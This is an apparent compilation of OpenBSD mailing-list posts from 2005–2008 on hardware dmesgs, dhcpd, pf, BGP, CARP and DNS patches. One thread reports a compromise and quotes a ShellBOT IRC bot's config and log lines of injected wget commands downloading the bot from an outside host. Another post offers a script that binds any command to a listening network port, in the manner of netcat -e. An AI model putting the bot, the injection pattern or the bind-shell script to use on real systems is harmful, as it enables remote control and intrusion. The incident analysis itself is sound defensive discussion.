wd1 at pciide1 channel 1 drive 0: 
wd1: 16-sector PIO, LBA48, 238475MB, 488397168 sectors
wd1(pciide1:1:0): using PIO mode 4, Ultra-DMA mode 5
ppb0 at pci0 dev 9 function 0 "Nvidia nForce4 PCI-PCI" rev 0xa2
pci1 at ppb0 bus 1
vga1 at pci1 dev 5 function 0 "Nvidia GeForce2 MX" rev 0xb2
wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation)
wsdisplay0: screen 1-5 added (80x25, vt100 emulation)
ppb1 at pci0 dev 12 function 0 "Nvidia nForce4 PCIE" rev 0xa3
pci2 at ppb1 bus 2
bge0 at pci2 dev 0 function 0 "Broadcom BCM5721" rev 0x11, BCM5750 B1  
(0x4101): apic 2 int 11 (irq 11), address 00:15:60:5f:93:49

brgphy0 at bge0 phy 1: BCM5750 10/100/1000baseT PHY, rev. 0
ppb2 at pci0 dev 13 function 0 "Nvidia nForce4 PCIE" rev 0xa3
pci3 at ppb2 bus 3
bge1 at pci3 dev 0 function 0 "Broadcom BCM5721" rev 0x11, BCM5750 B1  
(0x4101): apic 2 int 10 (irq 10), address 00:15:60:5f:93:48

brgphy1 at bge1 phy 1: BCM5750 10/100/1000baseT PHY, rev. 0
ppb3 at pci0 dev 14 function 0 "Nvidia nForce4 PCIE" rev 0xa3
pci4 at ppb3 bu

Re: PCI-X not seen by 3.8 on HP DL-145 G2

[Pete Vickers]

On 9. des. 2005, at 11.33, Srebrenko Sehic wrote:


On 12/9/05, Pete Vickers <[EMAIL PROTECTED]> wrote:


for my DL145 (pretty new) I get a reasonable-ish disk I/O of ~60Mb/s
( with CPU at 99% idle)

[EMAIL PROTECTED] /root> dd if=/dev/rwd0a of=/dev/null bs=1m count=1000
1000+0 records in
1000+0 records out
1048576000 bytes transferred in 17.645 secs (59423434 bytes/sec)
[EMAIL PROTECTED] /root>


Try testing read/write into files instead of raw device. Also, try
with smaller block sizes. I bet you will see different results.



yeah, this is pretty poor but consistent ( but cpu use is still  
negligible):


[EMAIL PROTECTED] /tmp> dd if=/dev/zero of=junk.data bs=1m count=500
500+0 records in
500+0 records out
524288000 bytes transferred in 68.774 secs (7623327 bytes/sec)
[EMAIL PROTECTED] /tmp>

[EMAIL PROTECTED] /tmp> dd if=/dev/zero of=junk.data bs=512k count=1000
1000+0 records in
1000+0 records out
524288000 bytes transferred in 68.576 secs (7645311 bytes/sec)
[EMAIL PROTECTED] /tmp>

LSI 300-8x problems

[Pete Bristow]

Hi all,

Having read the list archives, the decision was made to get a 300-8x for
a new server I'm putting together. 


However, I'm having 2 distinct problems. First of all, the card is only
detected when pcibios is disabled. The second being that during the
installation process, the disklabels are written, but the install then
"hangs" just after asking for confirmation to delete all data on the
paritions. If left for a while, "ami0: timeout ccb 126" is printed several
times. This has been tried both with the original firmware (LSI_FW_813F)
and with the latest firmware (LSI_FW_813J). 


There is a slew of dmesgs available (see the links below); with the new
and old firmware, and with and without pcibios enabled. The motherboard is
an Intel 925 chipset part.

Motherboard information: 
http://www.intel.com/design/servers/boards/SE7221BK1-E/index.htm

Dmesgs: http://midworld.co.uk/~dmesg/

Basically, has anyone got any ideas of how to get this thing working?

Thanks for any help

Pete

Re: dhcpd and static entries

[Pete Vickers]

On 12. des. 2005, at 21.22, Peter Hessler wrote:


This is with -current dhcpd within the last month.

On Mon, 12 Dec 2005 12:15:37 -0800
Peter Hessler <[EMAIL PROTECTED]> wrote:

: I have a dhcp'd network, with static entries for a ton of machines.
: The problem is that the range is for .10 - .254, and the static
: entries are scattered throughout.  When a random client requests an
: address, dhcpd will give out a staticly defined entry.  So when the
: static entry machine comes back, the two machines fight each other
: for the address.
:
: Moving the static entries to outside the range is unfeasable right
: now.  And it doesn't address the issue of 'machine was on a  
different

: dhcp network with an address that happens to be staticly defined on
: ours'.
:
: Why does dhcpd give out addresses that are currently in use, and why
: does it give out staticly defined addresses?  Shouldn't it remove  
the

: static entries from the dynamic pool?
:
:
: Sanitized portions of config:
:
: shared-network LOCAL-NET {
: option  domain-name "example.com";
: option  domain-name-servers 10.0.0.1;
:
: option  nis-domain "example.nis";
: option  nis-servers nis.example.com;
: option  ntp-servers ntp.example.com;
: option  time-offset -28800; # PST
:
: subnet 10.0.0.0 netmask 255.255.255.0 {
: option routers 10.0.0.1;
:
: range 10.0.0.10 10.0.0.254;
: }
:
: group {
:   use-host-decl-names on;
:  # host1.example.com 10.0.0.15
:host host1.example.com { hardware ethernet \
:  00:0f:1f:f7:7d:64; fixed-address host1.example.com; }
:  # host2.example.com 10.0.0.20
:   host host2.example.com { hardware ethernet \
:  02:A0:98:01:F5:B4; fixed-address host2.example.com; }
:  # host3.example.com 10.0.0.29
:   host host3.example.com { hardware ethernet \
:  00:0F:1F:F7:78:B6; fixed- address host3.example.com; }
:}
: }
:



I believe OpenBSD's dhcpd is based on ISC's implementation, in which  
case:
static entries are in the global scope and independent of any pool  
declaration. The error is one of configuration: you've defined static  
entries and dynamic pool overlapping = you've told it to use the IP  
addresses twice.
At a pinch, the option ping-check, might help you out if your address  
space utilisation is not too large.


/Pete

Re: Just confirming: no way to do a pf rdr based on hostname?

[Pete Vickers]

On 12. des. 2005, at 22.44, Peter Landry wrote:


Hi All,
We're migrating an old Microsoft ISA Server system to OpenBSD pf.  
First
off, before I ask any questions, kudos to everyone -- Installing  
OpenBSD

3.8 was a very pleasant, painless experience for someone who's never
used it before. Setting up pf/nat was also extraordinarily easy. The
docs are great.

That aside, the only thing that I haven't been able to migrate yet is
ISA's ability to redirect web requests coming in on the same IP to
different machines based on the host name. IE- www.a.com (IP
123.123.0.1) gets redirected to the internal IP 192.168.0.1 while
www.b.com (also IP 123.123.0.1) gets redirected to the internal IP
192.168.0.2.

I haven't found anything in the docs, and all the list archive  
questions

I've found were specific to ipnat, not pf.

I'm thinking that I can't do it. In that case, my options seem to  
be 1)
use different external IP's for each website, and redirect to  
different

internal servers based on IP 2) redirect all web traffic to the legacy
ISA system, which will then redirect based on hostname. I'm  
hesitant to

use up all our IPs for option 1, but I'm thinking option 2 is even
worse... Are there any options I haven't thought of?

Thanks for any advice...
Peter L.



You need to examine at the application layer for 'routing' such http  
requests, I'd take a look at reverse proxy'ing with either apache (in  
the base system) or squid in the packages. Either of those should be  
able to listen on your firewall's external interface, and forwarding  
http requests inbound based on  HTTP1.1 hostnames within the requests.


/Pete

Re: pf question

[Pete Vickers]

Better (IMHO) to use bgpd to suck down the 'bogon' prefixes, and then  
tag them for pf, see example here:


http://www.cymru.com/BGP/bogon-rs.html

/Pete


On 29. des. 2005, at 18.32, eric wrote:


On Thu, 2005-12-29 at 11:38:22 -0500, Dave Feustel proclaimed...


Has anyone on the list experience with using pf to
block ip addresses in the iana reserved ip address ranges list?


I don't think any of us have ever thought of that.

Oh wait..I may have... run this out of cron weekly

#!/bin/sh
#; $Id: gbogl.sh,v 1.3 2005/01/28 04:47:16 epancer Exp $
#; a small tool to grab bogon list from team cymru
#;

PATH="/usr/bin:/bin:/usr/sbin:/sbin"
BOGONFILE="/etc/bogon.txt"
BOGONURL="http://www.cymru.com/Documents/bogon-bn-nonagg.txt";

checkfile () {
 if [ ! -f $BOGONFILE ]; then
  echo "! $BOGONFILE must exist, exiting."
  exit 2
 fi
}

getnewfile () {
lynx -dump $BOGONURL > $BOGONFILE
}

fixperm () {
chmod 644 $BOGONFILE
}

logmsg () {
logger -p kern.notice "rewrote $BOGONFILE"
}

checkfile
getnewfile
fixperm
logmsg

exit 0


Then...

table  persist file "/etc/bogon.txt"

Somewhere in your pf.conf.

Re: How did they get here?

[Pete Vickers]

Hi,


Standard advise is to reinstall the o/s (3.8 ? ;-) and then _data_  
only from know good backup. You could use a boot cdrom & dd off an  
image of the disk for later analysis if you want first.


Is there some attack vector like php or such available on the  
machine ? maybe they used that to retrieve & write the file ? ... but  
access to /tmp is tricky from a chrooted httpd !



/Pete



On 4. jan. 2006, at 15.50, Gaby vanhegan wrote:


To begin, I'm running OpenBSD trim.chrispyfur.net 3.6 GENERIC.MP#173
i386.

I have some suspect files in /tmp, and I'm fairly sure that they
shouldn't be there.  Only thing I can't twig is what method the
attackers used to get the files into that directory.  The files are:

### Microsoft Search Worm - by br0k3d
###
   # From the same author of LinuxDay Worm and
other variants  ###

And:

#  ShellBOT
#  0ldW0lf - [EMAIL PROTECTED]
#  - www.atrix-br.cjb.net
#  - www.atrix.cjb.net

in /tmp/.cpanel and /tmp/.cpanel.tmp.  Reading them through, they
just look like IRC clients written in Perl that have some remote
commands for DOS, and the likes.  They connect to a chatroom and
print some message or other.  If anybody wants to have some fun, the
main config block is:

# IRC
my @adms=("darkwoot", "br0k3d", "vipzen", "Nandokabala");   #nick dos
administradores
my @canais=("#gestapo");
my $nick='ADOLFHITLER'; # nick do bot.. c o nick jah estiveh em uso..
vai aparece com um numero radonamico no final
my $ircname = 'SSSA';
chop (my $realname = `uname -a`);
$servidor='irc.agitamanaus.net' unless $servidor;   #servidor d irc q
vai c usadu c naum for especificado no argumento
my $porta='6667';   #porta do servidor d irc

My question is how did these files get into the machine.  I have
entries in the httpd error log that look like this:

--05:10:47--  http://arnold.dvclub.com.hk/phpBB2/linuxday.txt
=> `/tmp/.cpanel'
Resolving arnold.dvclub.com.hk... done.
Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... connected.
HTTP request sent, awaiting response... --05:10:57--  http://
arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt
=> `/tmp/.cpanel.tmp'
Resolving arnold.dvclub.com.hk... done.
Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... failed:
Connection timed out.
Retrying.

--05:12:13--  http://arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt
   (try: 2) => `/tmp/.cpanel.tmp'
Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... 200 OK
Length: 3,355 [text/plain]

 0K ...   100%
468.05 KB/s

05:12:27 (468.05 KB/s) - `/tmp/.cpanel' saved [3355/3355]

So something is clearly injecting a command into a script, and it is
causing wget to run and fetch some files.  There are more instances
of the same thing, but they're all fetching a file from the same
place (either .cpanel, .cpanel.tmp or .plesk).

Because they're in the default Apache error log, the attacker must
have hit a website on the machine that doesn't have an ErrorLog
defined, or they hit the machine by IP instead of a hostname.  I got
a list of sites that have no error log (and would log to /var/www/
logs/error_log) and checked their transfer logs.  None of them had
any entries in them that correspond to any of the times on the wget
entries, so I learn nothing from this.  There are earlier entries as
well, doing the same thing, but to a different site

I'm going to do a bulk grep on all the web server logs to see if
anything about wget turns up in any of them, and if I can then work
out which script on which site is causing the problem.  As far as I
can tell, there is no damage, but there are some entries like these
in the error logs:

/tmp/x44423[1]: ^?ELF^A^A^ALinux^B^C^A<80><80>^44: not found
/tmp/x44423[2]: 1?X<89>?<8D>T<81>^DP<83>??RQ??^A?: not found
/tmp/x44423[4]: syntax error: `(' unexpected

Am I right in thinking that these entries show somebody trying to run
a Linux binary unsuccessfully?  Good job I leave Linux emulation
turned off... :)

So, what's my next move?  My daily/weekly security emails show
nothing to be worried about, no changes to any system critical files
or anything of that ilk.  Where can I look for more information or
clues?  I know the machine is due for an upgrade, and that's next on
my list.  I would provide a dmesg but the machine has been up for a
while with one full disk, so it's been pushed out of the end of the
dmesg file.

Gaby

--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/

netcat man page: -e emulation

[Pete Vickers]

Hi,

The traditional netcat had a -e option to "Execute the specified  
command, using data from the network for stdin, and sending stdout  
and stderr to the network..."
Whilst I can understand that this option might not be desirable to be  
included in the binary (for security reason ?), I occasionally find  
it very useful, and so emulate it with a shell script:


$ cat wetcat
#!/bin/ksh
CMD="$*"
LISTEN_PORT=1234
MYPID=$$
FIFO=/tmp/${RANDOM}_${MYPID}.fifo
mkfifo -m 600 $FIFO
($CMD < $FIFO )  2>&1 | nc -l $LISTEN_PORT > $FIFO
rm $FIFO

If others would find it useful too, maybe it could be added to the  
examples section of the nc(1) man page ?


/Pete

Re: Temperature

[Pete Vickers]

Hi,

While we're on this subject, what about adding something like "  
sysctl -w | grep hw.sensor" to /etc/daily ? I'd consider the output  
of such to be as useful as the status of disk space etc.


/Pete


On 15. jan. 2006, at 16.25, Stuart Henderson wrote:


On 2006/01/15 13:05, Ricardo Lucas wrote:

anyone knows a program that monitoring the cpu temperature
and hard disk temperature


sysctl(8) (hw.sensors tree) is the natural place for this information,
you can be alerted if it exceeds parameters with sensorsd(8). Sensors
for many motherboards and SCSI safte(4) enclosures are monitored here.

SMART-capable ATA drives can be monitored with atactl(8), but you will
probably need further processing to get actual temperatures.


rotation?!


hard disk rotation - don't think so.
fan rotation - hw.sensors again.

3.9beta on macppc snapshot 30-01-06: no keyboard

[Pete Vickers]

Hi,

on my powerbook5,2 (G4 15"), runs through booting fine, but at the  
install,upgrade,shell prompt, the keyboard doesn't work ( but   
still lights the LED)


dmesg is thus little tricky to aquire...

/Pete

Re: 3.9beta on macppc snapshot 30-01-06: no keyboard

[Pete Vickers]

01488 sectors
wd0(wdc1:0:0): using PIO mode 4, DMA mode 2, Ultra-DMA mode 5
"Apple UniNorth Firewire" rev 0x81 at pci2 dev 14 function 0 not  
configured
gem0 at pci2 dev 15 function 0 "Apple Uni-N2 GMAC" rev 0x80: irq 41,  
address 00:0a:95:cd:87:c4

eephy0 at gem0 phy 0: Marvell 88E Gigabit PHY, rev. 1
rd0: fixed, 8192 blocks
uhidev0 at uhub2 port 1 configuration 1 interface 0
uhidev0: vendor 0x05ac product 0x1000, rev 2.00/15.86, addr 2, iclass  
3/1

ukbd0 at uhidev0
wskbd0 at ukbd0: console keyboard, using wsdisplay0
uhidev1 at uhub2 port 1 configuration 1 interface 1
uhidev1: vendor 0x05ac product 0x1000, rev 2.00/15.86, addr 2, iclass  
3/1

uhid0 at uhidev1: input=3, output=0, feature=1
bootpath: '/[EMAIL PROTECTED]/[EMAIL PROTECTED]/[EMAIL PROTECTED]/[EMAIL 
PROTECTED]/3.9/macppc/bsd.rd'
rootdev=0x1100 rrootdev=0x1100 rawdev=0x1102
WARNING: clock gained 6 days -- CHECK AND RESET THE DATE!
uhidev2 at uhub4 port 1 configuration 1 interface 0
uhidev2: Chicony USB Keyboard, rev 1.10/1.00, addr 2, iclass 3/1
ukbd1 at uhidev2
wskbd1 at ukbd1 mux 1
wskbd1: connecting to wsdisplay0
uhidev3 at uhub4 port 1 configuration 1 interface 1
uhidev3: Chicony USB Keyboard, rev 1.10/1.00, addr 2, iclass 3/1
uhid1 at uhidev3: input=4, output=0, feature=0
ural0 at uhub5 port 1
ural0: Ralink 802.11g WLAN + Pen Drive, rev 2.00/0.01, addr 2
ural0: MAC/BBP RT2570 (rev 0x03), RF RT2526, address 00:0f:ea:61:5b:70


I'm willing to test kernels, but 'able' is questionable: currently  
whole HDD is HFS+ , so whilst .iso's are easiest to test, I'll try &  
do an install onto a USB disk to test kernels if necessary.


/Pete


On 6. feb. 2006, at 22.55, Miod Vallat wrote:


on my powerbook5,2 (G4 15"), runs through booting fine, but at the
install,upgrade,shell prompt, the keyboard doesn't work ( but 
still lights the LED)


Can you try the latest snapshot (January 30th)? If the built-in  
keyboard

still fails to work, can you plug an external USB keyboard to get the
dmesg? And are you willing to test kernels if the problem still  
arises?


Miod

OpenBGPD dropping sessions.

[Pete Bristow]

Hi
I've got OpenBGPD running on 3.7, currently whenever I bring up a
session with another peer the session drops to Idle as soon as a set of
routes are learnt.

#macros
BD01="217.112.a.b"

AS 64513

router-id 85.234.132.65
neighbor $BD01 {
  remote-as 29550
  descr BD01
  multihop 3
  local-address 85.234.132.65
  announce none
}

deny from any prefix 10.0.0.0/8 prefixlen >= 8
deny from any prefix 172.16.0.0/12 prefixlen >= 12
deny from any prefix 192.168.0.0/16 prefixlen >= 16
deny from any prefix 169.254.0.0/16 prefixlen >= 16
deny from any prefix 192.0.2.0/24 prefixlen >= 24
deny from any prefix 224.0.0.0/4 prefixlen >= 4
deny from any prefix 240.0.0.0/4 prefixlen >= 4

The routes in particular are
Destination PeerNext-Hop MED ASPATH 
*i84.92.0.0  /15 195.66.224.164  195.66.224.164  90 6871
*i212.159.64.0   /18 195.66.224.164  195.66.224.164  90 6871
*i87.115.0.0 /16 195.66.224.164  195.66.224.164  90 6871
*i195.7.224.0/19 195.66.224.164  195.66.224.164   0 6871 8622 8622
*i87.114.0.0 /16 195.66.224.164  195.66.224.164  90 6871
*i87.113.0.0 /16 195.66.224.164  195.66.224.164  90 6871
*i87.112.0.0 /16 195.66.224.164  195.66.224.164  90 6871
*i212.159.0.0/19 195.66.224.164  195.66.224.164  90 6871
*i212.159.32.0   /19 195.66.224.164  195.66.224.164  90 6871
*i81.174.128.0   /17 195.66.224.164  195.66.224.164  90 6871
*i212.56.64.0/18 195.66.224.164  195.66.224.164  90 6871
*i80.229.0.0 /16 195.66.224.164  195.66.224.164  90 6871
*i212.84.96.0/19 195.66.224.164  195.66.224.164  0 6871 8622 8622
*i195.166.128.0  /19 195.66.224.164  195.66.224.164  90 6871

This behaviour has been observed when bringing sessions up against other
routers too. Is there a way of getting bgpd to log more information as
to why the session was torn down, rather than just logging state
changes. I would speak to AS6871 about the problem but as yet I havn't
worked out what's going wrong.

I tried logging everything with
log updates
dump all in "/var/log/bgp.log"

However when I look at the log with route_btoa it reveals nothing of
what brought down the session.

If I have left out anything pertinent beat me with a clue stick.

Thanks for any help you guys can give me.

Pete

Re: OpenBGPD dropping sessions.

[Pete Bristow]

Hi Henning

> * Pete Bristow <[EMAIL PROTECTED]> [2006-02-17 12:30]:
> 
>>I've got OpenBGPD running on 3.7, currently whenever I bring up a
>>session with another peer the session drops to Idle as soon as a set of
>>routes are learnt.
> 
> 
> that, of course, is not normal behaviour and nothing we ever observed...
> 
> 
>>This behaviour has been observed when bringing sessions up against other
>>routers too. Is there a way of getting bgpd to log more information as
>>to why the session was torn down, rather than just logging state
>>changes. I would speak to AS6871 about the problem but as yet I havn't
>>worked out what's going wrong.
> 
> 
> please show the logs. bgpd does log why a sessions drops back to IDLE.
> 

Feb 17 12:15:54 a bgpd[28123]: neighbor 217.112.a.b (BD01): state change
Idle -> Connect, reason: Start
Feb 17 12:15:54 a bgpd[28123]: neighbor 217.112.a.b (BD01): state change
Connect -> OpenSent, reason: Connection opened
Feb 17 12:15:54 a bgpd[28123]: neighbor 217.112.a.b (BD01): state change
OpenSent -> OpenConfirm, reason: OPEN message received
Feb 17 12:15:54 a bgpd[28123]: neighbor 217.112.a.b (BD01): state change
OpenConfirm -> Established, reason: KEEPALIVE message received
Feb 17 12:16:05 a bgpd[28123]: neighbor 217.112.a.b (BD01): state change
Established -> Idle, reason: Connection closed

Was all I got.

Pete

Re: Problem with squirrelmail

[Pete Vickers]

On 2. mar. 2006, at 14.00, Alexander Bochmann wrote:

...on Thu, Mar 02, 2006 at 01:07:09PM +0200, Gabriel George POPA  
wrote:


   I have a small problem with squirrelmail. The problem is that  
users
cannot read their mail messages if they are too large (though not  
very

 [..]

going on? Settings from /etc/inetd.conf:
# IMAP server from PINE
imap2streamtcpnowaitroot/usr/sbin/imapd
imapd


That doesn't really explain your problem, but if you
are running an imapd from inetd and have enough users,
you will certainly run into the default spawn limit
of 256 connections in 60 seconds.

Try cranking that up to a sensible number for your
environment (nowait.2048 or something).

Alex.



php has some system limits in php.ini , maybe you're hitting one of  
them ? any clues in you php_error log ?


BTW, if you're only running imap for the benefit of locally hosted  
squirrelmail, then you can use an inetd.conf line like:


127.0.0.1:imap  stream  tcp nowait  root/usr/local/libexec/ 
imapdimapd


for increased security.

/Pete

Re: using openbsd on zaurus

[Pete Vickers]

On 12. mar. 2006, at 13.37, Theo de Raadt wrote:


I'm planning to buy a zaurus sl-c3200 (the latest zaurus 3xxx model).


Please note that you would be the first person.  None of us have the
C3200 yet.


I had a look at the latest zaurus snapshot directories (on
ftp.openbsd.org) and saw that the choice of available pre-build
packages is highly reduced compared to i386.


Most stuff compiles.  Much has not been tested, though


Is it possible to compile and install any applications of the ports
tree on a zaurus (for example firefox, thunderbird ...)?


Those two are pretty unreasonable on the Zaurus.  It isn't that fast,
and it is somewhat lacking in memory.  There is some work on minimo,
but it isn't completely reliable yet.


Does the ports tree system work as well on a zaurus as on the i386
platforms or may I encounter severe build problems?


As I said above, it is pretty good.  But you have to be reasonable
about how fast and capable a Zaurus is.



Hi,




For faster cpu, and many built-in goodies, I believe a similar cpu  
(intel pxa270) is also used in the Qtek 9000 PDA:
http://www.qtekcorp.com/products.aspx? 
Level1=1&Menu1=0&Model=22&Submenu=2


including:
Intel XScale @ 520Mhz
640x480x65k touchscreen and QWERTY keyboard
GSM/GPRS/UMTS radio; 802.11b radio;
64MB RAM (128MB ROM) + SDIO/MMC card for decent flash disk.
mini-USB, IRDA, bluetooth.
2x loudspeakers/headphone, 1.3Mp camera.



obviously I'm aware cpu != machine etc etc.

I guess it would just be a case of buy 3 ( one for me, and 2 for obsd  
devs) and hope that sufficient documentation would prevail...


/Pete

recent CARP 'fixes'

[Pete Vickers]

Hi,

I have a pair of openbsd amd64 3.8+ boxes with a few shared carp  
interfaces. They were playing perfectly together until today. I  
upgraded one to the 20-03-06 snapshot ( the other is still at circa.  
18-12-2005). Now both the boxes claim to be carp MASTERs, with  
obvious consequences.


net.inet.carp.log=1 or tcpdump don't show any problems though.

/plus39.html lists 2 carp fixes. The first releates to HMAC calc, so  
I disabled the carp password, without any effect. The other fix  
relates to a 'short' incorrect MASTER status at boot - where as mine  
seems to persist indefinitely.


Is this an incompatability between o/s versions, or just a passing - 
current hiccup ?



/Pete


[EMAIL PROTECTED] /root> cat /var/run/dmesg.boot
OpenBSD 3.9-current (GENERIC.MP) #750: Sun Mar 19 18:25:28 MST 2006
[EMAIL PROTECTED]:/usr/src/sys/arch/amd64/compile/ 
GENERIC.MP

real mem = 2146140160 (2095840K)
avail mem = 1834962944 (1791956K)
using 22937 buffers containing 214822912 bytes (209788K) of memory
mainbus0 (root)
ipmi0 at mainbus0: version 1.5 interface KCS iobase 0xca2/2 spacing 1
mainbus0: scanning 0x98800 to 0x98bf0 for MP signature
mainbus0: scanning 0x98400 to 0x987f0 for MP signature
mainbus0: scanning 0xf to 0x0 for MP signature
mainbus0: MP floating pointer found in bios at 0xf72f0
mainbus0: MP config table at 0x9bb20, 372 bytes long
mainbus0: Intel MP Specification (Version 1.4) (AMD  HAMMER  )
cpu0 at mainbus0: apid 0 (boot processor)
cpu0: AMD Opteron(tm) Processor 252, 2612.34 MHz
cpu0:  
FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, 
CFLUSH,MMX,FXSR,SSE,SSE2,SSE3,NXE,MMXX,FFXSR,LONG,3DNOW2,3DNOW
cpu0: 64KB 64b/line 2-way I-cache, 64KB 64b/line 2-way D-cache, 1MB  
64b/line 16-way L2 cache
cpu0: ITLB 32 4KB entries fully associative, 8 4MB entries fully  
associative
cpu0: DTLB 32 4KB entries fully associative, 8 4MB entries fully  
associative

cpu0: calibrating local timer
cpu0: apic clock running at 200MHz
cpu0: kstack at 0x800067d66000 for 20480 bytes
cpu0: idle pcb at 0x800067d66000, idle sp at 0x800067d6aff0
cpu1 at mainbus0: apid 1 (application processor)
cpu1: AMD Opteron(tm) Processor 252, 2612.04 MHz
cpu1:  
FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, 
CFLUSH,MMX,FXSR,SSE,SSE2,SSE3,NXE,MMXX,FFXSR,LONG,3DNOW2,3DNOW
cpu1: 64KB 64b/line 2-way I-cache, 64KB 64b/line 2-way D-cache, 1MB  
64b/line 16-way L2 cache
cpu1: ITLB 32 4KB entries fully associative, 8 4MB entries fully  
associative
cpu1: DTLB 32 4KB entries fully associative, 8 4MB entries fully  
associative

cpu1: kstack at 0x800067d6b000 for 20480 bytes
cpu1: idle pcb at 0x800067d6b000, idle sp at 0x800067d6fff0
mpbios: bus 0 is type PCI
mpbios: bus 1 is type PCI
mpbios: bus 2 is type PCI
mpbios: bus 3 is type PCI
mpbios: bus 4 is type PCI
mpbios: bus 128 is type PCI
mpbios: bus 129 is type PCI
mpbios: bus 134 is type PCI
mpbios: bus 139 is type ISA
ioapic0 at mainbus0 apid 2 pa 0xfec0, virtual wire mode, version  
11, 24 pins
ioapic1 at mainbus0 apid 3 pa 0xd800, virtual wire mode, version  
11, 7 pins
ioapic2 at mainbus0 apid 4 pa 0xd8001000, virtual wire mode, version  
11, 7 pins

ioapic0: int0 attached to ExtINT (type 0x3 flags 0x5)
ioapic0: int1 attached to isa0 irq 1 (type 0x0 flags 0x5)
ioapic0: int2 attached to isa0 irq 2 (type 0x0 flags 0x5)
ioapic0: int3 attached to isa0 irq 3 (type 0x0 flags 0x5)
ioapic0: int4 attached to isa0 irq 4 (type 0x0 flags 0x5)
ioapic0: int5 attached to isa0 irq 5 (type 0x0 flags 0x5)
ioapic0: int6 attached to isa0 irq 6 (type 0x0 flags 0x5)
ioapic0: int7 attached to isa0 irq 7 (type 0x0 flags 0x5)
ioapic0: int8 attached to isa0 irq 8 (type 0x0 flags 0x5)
ioapic0: int9 attached to isa0 irq 9 (type 0x0 flags 0x5)
ioapic0: int10 attached to isa0 irq 10 (type 0x0 flags 0xf)
ioapic0: int11 attached to isa0 irq 11 (type 0x0 flags 0xf)
ioapic0: int12 attached to isa0 irq 12 (type 0x0 flags 0x5)
ioapic0: int13 attached to isa0 irq 13 (type 0x0 flags 0x5)
ioapic0: int14 attached to isa0 irq 14 (type 0x0 flags 0x5)
ioapic0: int15 attached to isa0 irq 15 (type 0x0 flags 0x5)
ioapic0: int10 attached to pci0 device 2 INT_A (type 0x0 flags 0xf)
ioapic0: int11 attached to pci0 device 2 INT_B (type 0x0 flags 0xf)
ioapic0: int10 attached to pci0 device 8 INT_A (type 0x0 flags 0xf)
ioapic0: int11 attached to pci1 device 5 INT_A (type 0x0 flags 0xf)
ioapic0: int11 attached to pci2 device 0 INT_A (type 0x0 flags 0xf)
ioapic0: int10 attached to pci3 device 0 INT_A (type 0x0 flags 0xf)
local apic: int0 attached to ExtINT (type 0x3 flags 0x5)
local apic: int1 attached to NMI (type 0x1 flags 0x5)
mainbus0: MP WARNING: 160 bytes of extended entries not examined
pci0 at mainbus0 bus 0: configuration mode 1
"NVIDIA nForce4 DDR" rev 0xa3 at pci0 dev 0 function 0 not configured
pcib0 at pci0 dev 1 function 0 "NVIDIA nForce4 ISA" rev 0xa3
nviic0 at pci0 dev 1 function 1 &

Re: OT: App to get detailed http measurements

[Pete Vickers]

I've had good results with SIEGE

http://www.joedog.org/

/Pete




On 14 Jun 2008, at 12:55, Mikolaj Kucharski wrote:


Hi,

This is off topic, but does anyone know preferably commandline utility
with which I could test HTTP server? What interests me is repeated
connections and stats how long it took dns resolv, tcp connect, send
request and finaly download of data.

Really appreciate any tips. Thanks.

--
best regards
q#

Re: pass pasword to ssh

[Pete Vickers]

perhaps you could write your script in perl ?

http://www.openbsd.org/4.3_packages/i386/p5-Net-SSH-Perl-1.30.tgz-long.html

/Pete


On 19 Jun 2008, at 16:31, Stuart Henderson wrote:


On 2008-06-19, Richard Storm <[EMAIL PROTECTED]> wrote:
I am writing script, that would ssh to switch and dump  
configuration in file.


1) Since it is switch, i have no way to make use of public key
authentication, because I have no way to store pubkey on switch.


Which switch? On my HP switches I can just sftp the public
keys in (and fetch the config back out the same way...)


What is the cleanest way to pass password to ssh?


Not sure about "cleanest", but expect (in packages/ports) works ok.
You can generate a script with "autoexpect" and manually edit it.

Re: OpenBSD project goals

[Pete Vickers]

nah, real men wrote a program to write their thesis for them ;-)

/Pete



On 24 Jun 2008, at 22:29, Martin Schrvder wrote:


2008/6/24 Pierre Riteau <[EMAIL PROTECTED]>:

As someone already said earlier, you can write your letter in troff
with mg or vi and create a postscript file from that.


Real Men wrote their thesis directly in PostScript using ed. :-)

Best
  Martin

DNS patch

[Pete Vickers]

Does this mean we should expect one soon ?


http://securosis.com/publications/CERT%20Advisory.doc


/Pete

Re: Vulnerability Note VU#800113 - Multiple DNS implementations vulnerable to cache poisoning

[Pete Vickers]

looks like there is some work in progress to update the in-tree BIND  
to 9.4.2-P1 + local tweaking, for example:


http://www.openbsd.org/cgi-bin/cvsweb/src/usr.sbin/bind/lib/dns/dispatch.c?r1=1.8

As Theo points out, patience is a virtue, and it's the "+ local  
tweaking" above that is the reason I gratefully use OpenBSD.



/Pete




On 9 Jul 2008, at 16:45, Zamri Besar wrote:


Good morning,

Today, I'm received alert from one of my friends regarding to
Vulnerability Note VU#800113 - Multiple DNS implementations vulnerable
to cache poisoning.
http://www.kb.cert.org/vuls/id/800113

I checked the above site, and found that most of the *BSD status are
unknown. Is this bug affected OpenBSD default bind dns?

I'm don't know either the above bug is similar to this thread or not.
http://marc.info/?l=openbsd-misc&m=118539211412877&w=2

--
Thank you.

Yours truly,

Zamri Besar

Re: eeepc via usb pen

[Pete Vickers]

1. enable netboot in eee's BIOS settings
2. man 8 pxeboot

/Pete
On 23 Jul 2008, at 16:33, [EMAIL PROTECTED] wrote:


Hi
Sorry for the noise but I am trying to install openbsd an an eeepc  
via a usb pen. I have managed to install 4.(1 or 2) in the past but  
do not seem to be able to get the 4.3 install to boot off a pen. I  
know I could (hopefully) un-tar the files from the install4.3.iso  
mounted with loopback on another *nix and copy the fs then configure  
everything and dd the mbr (or something like that); the closest i  
have got is a kernel panic saying boot too old upgrade when I try to  
boot bsd.rd via grub. But is there an easier way (without buying a  
usb cdrom) to boot the usb pen as a install source

or take any action in reliance on its content.
***

***
This email has been checked for known viruses.
***

Re: Is it necessary to recompile OS to apply security patch?

[Pete Vickers]

Hi,

